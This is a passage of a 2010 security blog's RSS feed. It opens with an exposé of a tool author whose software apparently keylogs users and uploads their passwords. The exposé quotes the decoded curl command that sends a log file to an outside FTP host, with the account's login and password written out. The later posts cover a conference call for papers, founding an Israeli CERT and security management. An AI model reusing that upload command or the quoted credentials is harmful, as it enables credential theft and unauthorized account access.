activation &#8211; how many passwords do you manage to grab?<br />
fadzilmahfodh(2:49 PM):  well, the ftp is to confirm that software match with<br />
data in server<br />
fadzilmahfodh(2:49 PM):  if it does not match, it will fail to run<br />
fadzilmahfodh(2:49 PM):  or i can just change the data/activation code in the<br />
server<br />
fadzilmahfodh(2:49 PM):  then everything will not run<br />
Iftach(2:49 PM):  and how does that relate to the keylogging?<br />
fadzilmahfodh(2:50 PM):  well, that i another story&#8230;<br />
Iftach(2:51 PM):  I mean &#8211; the keylogger data is sent to that FTP. Is that part<br />
of the verification or is this a separate process?<br />
Iftach(2:51 PM):  So, on average, how many accounts you manage to get on that<br />
FTP server per day?<br />
fadzilmahfodh(2:51 PM):  well, you do not even support my website and how the<br />
hell am i going to tell you<br />
Iftach(2:52 PM):  Let&#8217;s just get it straight &#8211; I&#8217;m not going to &#8220;support&#8221; the<br />
site&#8230; I&#8217;m just doing some research on security tools.<br />
fadzilmahfodh(2:52 PM):  bye<br />
Iftach(2:53 PM):  You are free to tell, or not if you don&#8217;t want to. But I&#8217;m<br />
publishing the story as it is&#8230;<br />
Iftach(2:53 PM):  With your acknowledgment that you use a keylogger to steal your<br />
site visitor passwords. Unless you want to be quoted otherwise in the story&#8230;</p></blockquote>
<p>True to my chat with Fadzil (or whatever his name is), I’m telling it the way it is.</p>
<p>But wait, there’s more!!! more? how come? well, just to put some icing on this, I went back and decoded the script that was in charge of the FTP upload&#8230;</p>
<blockquote><p>curl -s -k &#8211;ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt</p></blockquote>
<p>Just to see the final lameness come to life as I tested the account:</p>
<p><a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/wpid-ftpfail-2010-07-8-09-48.png" rel="lightbox[483]"><img src="http://www.iamit.org/blog/wp-content/uploads/2010/07/wpid-ftpfail-2010-07-8-09-48.png" alt="wpid-ftpfail-2010-07-8-09-48.png" width="514" height="178" /></a></p>
<p>And you know what &#8211; it’s all our fault! If we as a community would have “donated” to this guy for all his hard work and effort that he’s been putting in creating tools that are used by the FBI (check out his site&#8230;), he would have had the money to keep his driveHQ account in order and could make a decent living out of ripping people off.</p>
<p>Seriously.</p>
<p>p.s. you can find me talking about this entertaining even on <a href="http://www.isdpodcast.com/episode-167-targeting-security-newbies-w-iftach-ian-amit/">the ISDPodcast</a> with my buddy Rick, I just had to vent off before putting this in writing, so hopefully this account is a bit more thorough and to your liking&#8230;</p>
<p><strong>Update 7/13/2010</strong>: I could not have wished for better response from the community on this post, but having the actual culprit respond here is priceless. As you can probably see, Fadzil has posted a comment, and to sum things up let me just state that I&#8217;m not that surprised by its content (I think it&#8217;s called &#8220;pulling a ligatt&#8221; these days&#8230;). On one hand he offhandedly dismisses that there was ever such an issue with a keylogger, on the other hand he promises a better version with (and I&#8217;m quoting): &#8220;rogue ap + fake login page + keylogger + ftp = to get WPA or WPA2 password&#8221;.</p>
<p>You don&#8217;t say?! I&#8217;m still waiting for the security practitioner that will explain to me why would anyone need a keylogger + ftp to use a rogue AP with fake login pages. I&#8217;m really hoping that this post helps the community learn more on criminals such as the one we are dealing with here. Don&#8217;t be tempted to &#8220;smooth-talk&#8221; that tries to look technical and hackerish while having nothing behind it. And if you have had any additional experiences with this guy feel free to add them to the comments or email me so I&#8217;ll update this story for everyone&#8217;s benefit.</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/07/tying-up-loose-ends-before-vegas-scammer-closure/' rel='bookmark' title='Permanent Link: Tying up loose ends before Vegas (scammer closure)'>Tying up loose ends before Vegas (scammer closure)</a></li>
<li><a href='http://www.iamit.org/blog/2009/04/credit-cards-on-a-clearance-sale-and-your-internet-security/' rel='bookmark' title='Permanent Link: Credit cards on a clearance sale and your internet security'>Credit cards on a clearance sale and your internet security</a></li>
<li><a href='http://www.iamit.org/blog/2010/07/the-turkish-hack-and-another-case-for-il-cert/' rel='bookmark' title='Permanent Link: The Turkish hack and another case for IL-CERT'>The Turkish hack and another case for IL-CERT</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/feed/</wfw:commentRss>
		<slash:comments>22</slash:comments>
		</item>
		<item>
		<title>Cloud Security Alliance Conference (Israel) &#8211; CFP</title>
		<link>http://www.iamit.org/blog/2010/06/cloud-security-alliance-conference-israel-cfp/</link>
		<comments>http://www.iamit.org/blog/2010/06/cloud-security-alliance-conference-israel-cfp/#comments</comments>
		<pubDate>Wed, 23 Jun 2010 14:09:06 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Security Research]]></category>
		<category><![CDATA[cloud security]]></category>
		<category><![CDATA[conference]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[technology]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=478</guid>
		<description><![CDATA[Just wanted to let you all know (as a member of the CSA-IL board) that we will be having a conference on September 2nd who&#8217;s title is &#8220;Cloud Security Technology and Innovations&#8221; in Tel-Aviv, Israel. We expect to have great participation from all areas of the industry, are working on a great venue to host [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/05/upcoming-conference-schedule/' rel='bookmark' title='Permanent Link: Upcoming Conference Schedule'>Upcoming Conference Schedule</a></li>
<li><a href='http://www.iamit.org/blog/2009/11/excaliburcon-summary-and-general-china-notes/' rel='bookmark' title='Permanent Link: ExcaliburCon summary and general China notes'>ExcaliburCon summary and general China notes</a></li>
<li><a href='http://www.iamit.org/blog/2010/08/updated-speaking-schedule/' rel='bookmark' title='Permanent Link: Updated speaking schedule!'>Updated speaking schedule!</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Just wanted to let you all know (as a member of the CSA-IL board) that we will be having a conference on September 2nd who&#8217;s title is &#8220;Cloud Security Technology and Innovations&#8221; in Tel-Aviv, Israel.</p>
<p>We expect to have great participation from all areas of the industry, are working on a great venue to host the conference, and are opening up the Call for Papers.</p>
<p>Please see the CSA-IL WiKi for additional information on how to submit for the CFP:</p>
<p><a href="http://wiki.csail.dreamhosters.com/wiki/CSA_conference#Call_for_papers">http://wiki.csail.dreamhosters.com/wiki/CSA_conference#Call_for_papers</a><img class="alignright" src="http://media01.linkedin.com/media/p/1/000/020/144/15d373e.png" alt="" width="100" height="50" /></p>
<p>Looking forward to seeing you all there!</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/05/upcoming-conference-schedule/' rel='bookmark' title='Permanent Link: Upcoming Conference Schedule'>Upcoming Conference Schedule</a></li>
<li><a href='http://www.iamit.org/blog/2009/11/excaliburcon-summary-and-general-china-notes/' rel='bookmark' title='Permanent Link: ExcaliburCon summary and general China notes'>ExcaliburCon summary and general China notes</a></li>
<li><a href='http://www.iamit.org/blog/2010/08/updated-speaking-schedule/' rel='bookmark' title='Permanent Link: Updated speaking schedule!'>Updated speaking schedule!</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/06/cloud-security-alliance-conference-israel-cfp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>FIRST and IL-CERT</title>
		<link>http://www.iamit.org/blog/2010/06/first-and-il-cert/</link>
		<comments>http://www.iamit.org/blog/2010/06/first-and-il-cert/#comments</comments>
		<pubDate>Mon, 21 Jun 2010 17:53:36 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[CERT]]></category>
		<category><![CDATA[conference]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=476</guid>
		<description><![CDATA[Insights from FIRST conference in Miami, and the beginning of IL-CERT.


Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/07/the-turkish-hack-and-another-case-for-il-cert/' rel='bookmark' title='Permanent Link: The Turkish hack and another case for IL-CERT'>The Turkish hack and another case for IL-CERT</a></li>
<li><a href='http://www.iamit.org/blog/2010/06/cloud-security-alliance-conference-israel-cfp/' rel='bookmark' title='Permanent Link: Cloud Security Alliance Conference (Israel) &#8211; CFP'>Cloud Security Alliance Conference (Israel) &#8211; CFP</a></li>
<li><a href='http://www.iamit.org/blog/2008/10/taking-the-red-pill-down-the-rabbit-hole/' rel='bookmark' title='Permanent Link: Taking the Red Pill Down the Rabbit Hole'>Taking the Red Pill Down the Rabbit Hole</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Funny thing how I got to go to Miami last week&#8230;</p>
<p>So, one time, at security camp, I figured that there isn&#8217;t a whole lot of infrastructure in my back yard to really call a decent CERT. I have <a href="http://www.iamit.org/blog/2008/02/crimeware-server-and-the-international-man-of-mystery/">experienced</a> that <a href="http://www.iamit.org/blog/2008/01/the-impact-of-just-5-random-letters/">multiple</a> <a href="http://www.iamit.org/blog/2008/05/crimeware-server-catering-to-%E2%80%9Cgrab-and-run%E2%80%9D-criminals/">times</a> (<a href="http://www.iamit.org/blog/2008/10/taking-the-red-pill-down-the-rabbit-hole/">and</a> <a href="http://www.iamit.org/blog/2008/11/hosting-provider-crackdown/">again</a> and <a href="http://www.iamit.org/blog/2010/04/cybercrimewar-connecting-the-dots-blackhat-eu-2010/">again</a>) when handling major incidents that prompted incident handling in dozens of countries around the world, and when trying to do the same back home (in Israel), I got &#8220;bobkes&#8221;.</p>
<p>The thing is, there are currently two &#8220;CERTs&#8221; operating in Israel &#8211; an academic one (<a href="http://cert.iucc.ac.il/en/about_us.html">ILAN-CERT</a>) which only server a portion of the actual academic networks in Israel (surprise surprise&#8230;), and <a href="http://www.cert.gov.il/">CERTGOV-IL</a> (which seems to be mostly in maintenance mode, and only server the government sites). Bottom line &#8211; if you want to report an incident that does not fall into these CERTs constituency (about 90% of the cases), you are out of luck&#8230;</p>
<p>So, just like the ever-optimistic fool that I am, I decided to give it a try and start a normal IL-CERT. Back at the time when I started to dance the political/bureaucratical dance I figured that it would be a good idea to present at <a href="http://conference.first.org/">FIRST2010</a> as IL-CERT would be alive by then. Ahhh, the optimism&#8230;</p>
<p>Months went by, emails flew, and meeting were held, and I arrived at the FIRST conference with only a glimmer of hope for a decent CERT. I almost dropped all hope for it, but then had a great time running into the FIRST crowd. Every time I got into a conversation with a member, I usually got the same question: &#8220;so, can I send you information on incidents in Israel? Because there isn&#8217;t anyone to send data to for years&#8221;.</p>
<p>Embarrassing. Nothing less (and to think that there was another Israeli &#8220;CERT&#8221; member onsite&#8230;). Long story short &#8211; I&#8217;m currently willing to put my hiney on the line and at least be able to say that I tried.</p>
<p>So here goes &#8211; I&#8217;m publishing an open call to anyone local who would like to participate and contribute to the IL-CERT. Also &#8211; if you need/want to report on any incident related to the constituency of a decent IL-CERT, please feel free to pass it my way until we set up the basic infrastructure for IL-CERT.</p>
<p>Wish me (us?) luck and godspeed. And thanks again to everyone who I met at FIRST-2010 and have reinforced my crazy endeavor.</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/07/the-turkish-hack-and-another-case-for-il-cert/' rel='bookmark' title='Permanent Link: The Turkish hack and another case for IL-CERT'>The Turkish hack and another case for IL-CERT</a></li>
<li><a href='http://www.iamit.org/blog/2010/06/cloud-security-alliance-conference-israel-cfp/' rel='bookmark' title='Permanent Link: Cloud Security Alliance Conference (Israel) &#8211; CFP'>Cloud Security Alliance Conference (Israel) &#8211; CFP</a></li>
<li><a href='http://www.iamit.org/blog/2008/10/taking-the-red-pill-down-the-rabbit-hole/' rel='bookmark' title='Permanent Link: Taking the Red Pill Down the Rabbit Hole'>Taking the Red Pill Down the Rabbit Hole</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/06/first-and-il-cert/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Identity crisis</title>
		<link>http://www.iamit.org/blog/2010/06/identity-crisis/</link>
		<comments>http://www.iamit.org/blog/2010/06/identity-crisis/#comments</comments>
		<pubDate>Mon, 07 Jun 2010 11:11:40 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[cyberwar]]></category>
		<category><![CDATA[cyberwarfare]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[identity]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[risk management]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[security policy]]></category>
		<category><![CDATA[technology]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/2010/06/identity-crisis/</guid>
		<description><![CDATA[Here’s a common question I get asked a lot: “What technology should I use to secure my server/network/[some technology]?” The question is usually presented by someone who’s in charge of “Security” in an organization. Now, I wouldn’t have had a problem with this if this was a technician, or a pen-tester of sorts, but I [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/07/practical-vs-regulatory-the-votes-are-in/' rel='bookmark' title='Permanent Link: Practical vs. Regulatory &#8211; the votes are in!'>Practical vs. Regulatory &#8211; the votes are in!</a></li>
<li><a href='http://www.iamit.org/blog/2008/12/who-owns-your-online-identity-facebook-squatters-on-the-rise/' rel='bookmark' title='Permanent Link: Who owns your online identity? Facebook squatters on the rise'>Who owns your online identity? Facebook squatters on the rise</a></li>
<li><a href='http://www.iamit.org/blog/2010/05/being-in-the-middle/' rel='bookmark' title='Permanent Link: Being in the middle (or: things we didn&#8217;t manage to learn in a decade)'>Being in the middle (or: things we didn&#8217;t manage to learn in a decade)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Here’s a common question I get asked a lot: “What technology should I use to secure my server/network/[some technology]?”</p>
<p><img class="alignright" src="http://www.iamit.org/blog/wp-content/uploads/2010/06/wpid-IdentityCrisis-2010-06-7-14-11.jpg" alt="wpid-IdentityCrisis-2010-06-7-14-11.jpg" width="167" height="133" />The question is usually presented by someone who’s in charge of “Security” in an organization. Now, I wouldn’t have had a problem with this if this was a technician, or a pen-tester of sorts, but I get really nervous when the CISO/CIO/Security manager is the one asking.</p>
<p>I think that this question is highly inappropriate for two reasons:</p>
<ol style="list-style-type: decimal;">
<li>You should not be looking for “technology”. Buying a product is not going to make you more secure or less secure.</li>
<li>You should not be trying to protect a technology. Your servers, networks, routers, PCs, etc&#8230; are not the focus of information security. The information is&#8230;</li>
</ol>
<p>Having been working with senior management &#8211; sometimes as an advisor/consultant, and sometimes as a “virtual CISO”, I know that this is not what we expect the CISO or security manager to ask. We expect business savvy, we expect an understanding of what the information assets are, what are the information critical paths, who owns the information and what is the impact of every asset on the business. We expect that the understanding of how each assets fits into the grand scheme of things would be clear to whoever is in charge of securing it, and we expect them to take into account what is the potential damage related to each of these assets (in terms of losing it, having it fall into the wrong hands, etc&#8230;).<br />
For me (or us when talking as management) this is the only way to approach security. Funny how things get a little unclear when all you thought you needed to know was which vendor/product fits where in your topology, huh?</p>
<p>What strikes me as most peculiar is the fact that a lot of these security “professionals” find themselves in a self proclaimed identity crisis, having to deal with business requirements and financial understanding of how the business operates. and the weirdest thing is that they often choose to get back to what then “know” best &#8211; the technology side of things. Definitely not the way to make a move&#8230;</p>
<p><img class="alignleft" src="http://www.iamit.org/blog/wp-content/uploads/2010/06/wpid-risk-blocks-2010-06-7-14-11.jpg" alt="wpid-risk-blocks-2010-06-7-14-11.jpg" width="161" height="160" />I’m really hoping that all this preaching of “know thyself before you know your enemy” would help somehow, because right now unfortunately the situation at hand only brings us more business (not that I’m complaining). But seriously now &#8211; technology is fine and cool, but having the aptitude to know where it fits, not on an architectural level, but from a business perspective is the key to what we do. Get back to the drawing board, erase the network topology and start drawing the business one!</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/07/practical-vs-regulatory-the-votes-are-in/' rel='bookmark' title='Permanent Link: Practical vs. Regulatory &#8211; the votes are in!'>Practical vs. Regulatory &#8211; the votes are in!</a></li>
<li><a href='http://www.iamit.org/blog/2008/12/who-owns-your-online-identity-facebook-squatters-on-the-rise/' rel='bookmark' title='Permanent Link: Who owns your online identity? Facebook squatters on the rise'>Who owns your online identity? Facebook squatters on the rise</a></li>
<li><a href='http://www.iamit.org/blog/2010/05/being-in-the-middle/' rel='bookmark' title='Permanent Link: Being in the middle (or: things we didn&#8217;t manage to learn in a decade)'>Being in the middle (or: things we didn&#8217;t manage to learn in a decade)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/06/identity-crisis/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>The community to the rescue again</title>
		<link>http://www.iamit.org/blog/2010/06/the-community-to-the-rescue-again/</link>
		<comments>http://www.iamit.org/blog/2010/06/the-community-to-the-rescue-again/#comments</comments>
		<pubDate>Wed, 02 Jun 2010 09:44:14 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[conference]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[cyberwar]]></category>
		<category><![CDATA[cyberwarfare]]></category>
		<category><![CDATA[predictions]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[social network]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/2010/06/the-community-to-the-rescue-again/</guid>
		<description><![CDATA[I’ve had some hard time coming up with this post. I had the great opportunity to travel quite a bit lately &#8211; specifically to Berlin where basically EVERYBODY in security was at ph-neutral (have I thanked FX yet? I think so, but anyway &#8211; great con/party!). It all started in Berlin when I realized what [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/08/updated-speaking-schedule/' rel='bookmark' title='Permanent Link: Updated speaking schedule!'>Updated speaking schedule!</a></li>
<li><a href='http://www.iamit.org/blog/2010/01/cybercrime-cyberwarfare-and-2010/' rel='bookmark' title='Permanent Link: CyberCrime, CyberWarfare, and 2010'>CyberCrime, CyberWarfare, and 2010</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/exoticliability-podcast-interview/' rel='bookmark' title='Permanent Link: ExoticLiability podcast interview'>ExoticLiability podcast interview</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I’ve had some hard time coming up with this post. I had the great opportunity to travel quite a bit lately &#8211; specifically to Berlin where basically EVERYBODY in security was at <a href="http://ph-neutral.darklab.org/talks.html">ph-neutral</a> (have I thanked FX yet? I think so, but anyway &#8211; great con/party!). </p>
<p>It all started in Berlin when I realized what an amazing community we have. People from all over the world coming over for 3 days of sharing, networking and listening to talks (oh, and partying). I also have the great honor of calling a few of these guys friends. Friends that I know that I would be honored to help if they needed anything, and friends that I know I can “drop on” if I happen to get into a snag in their hometown. Friends that I only see in-person 2-4 times a year, but still consider them one of my closest.</p>
<p>I saw borders dissolve in an instant as politics, geography and history dropped in sight of a beer or a cool PoC demo on someone’s PC, and I had great conversations with people I just got to know and am sure will run into again in the future.</p>
<p>And then I got back home. I don’t need to mention the unfortunate events that took place a couple of days ago, and I’m not going to point fingers at anyone. Everyone had their agenda, some sides were more optimistic, some had better planning, some had better intent, but the end result is what it was. Sometimes as we say it’s better to be smart than to be right&#8230;</p>
<p>That was just a day before I flew over to Athens to talk at <a href="http://www.athcon.org/">Athcon</a>. People around me started freaking out, having the entire area feel like a barrel of gunpowder, and the media adding in some FUD to top it off. And then I recalled ph-neutral. A couple of hours later, a friendly cabbie and what looks to be a really cool con, everything is left behind. The community wins again, while politicians keep meddling with their agendas.</p>
<p>I just hope that more people could find such communities where borders are bridged, and religion/ethnicity/gender become irrelevant in light of a common cause/interest. I’m truly happy that I had a chance to debunk myths that I’ve had in my mind, and other people had in theirs, and really hope that this focus on a common interest could work elsewhere.<br />
Now off to polish off my presentation for tomorrow. Stay safe out there!</p>
<p><strong>Quick update [6/7/2010]</strong>: Athcon was fantastic! I’ve had a great time in Athens, had a chance to finally meet some really brilliant minds that I’ve been following for some time online, and was fortunate enough to experience the famous greek hospitality. I am reassured with my previous assumptions that all these politics are just the attempt of politicians to prove that they are worth their salaries (hint -they don’t). We just want to live our lives quietly &#8211; the only reason for some kind of army/politicians is to fend off anyone who wants to disturb this (terrorists).</p>
<p>Back to work now, as I need to start prepping for Miami next week&#8230;</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/08/updated-speaking-schedule/' rel='bookmark' title='Permanent Link: Updated speaking schedule!'>Updated speaking schedule!</a></li>
<li><a href='http://www.iamit.org/blog/2010/01/cybercrime-cyberwarfare-and-2010/' rel='bookmark' title='Permanent Link: CyberCrime, CyberWarfare, and 2010'>CyberCrime, CyberWarfare, and 2010</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/exoticliability-podcast-interview/' rel='bookmark' title='Permanent Link: ExoticLiability podcast interview'>ExoticLiability podcast interview</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/06/the-community-to-the-rescue-again/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
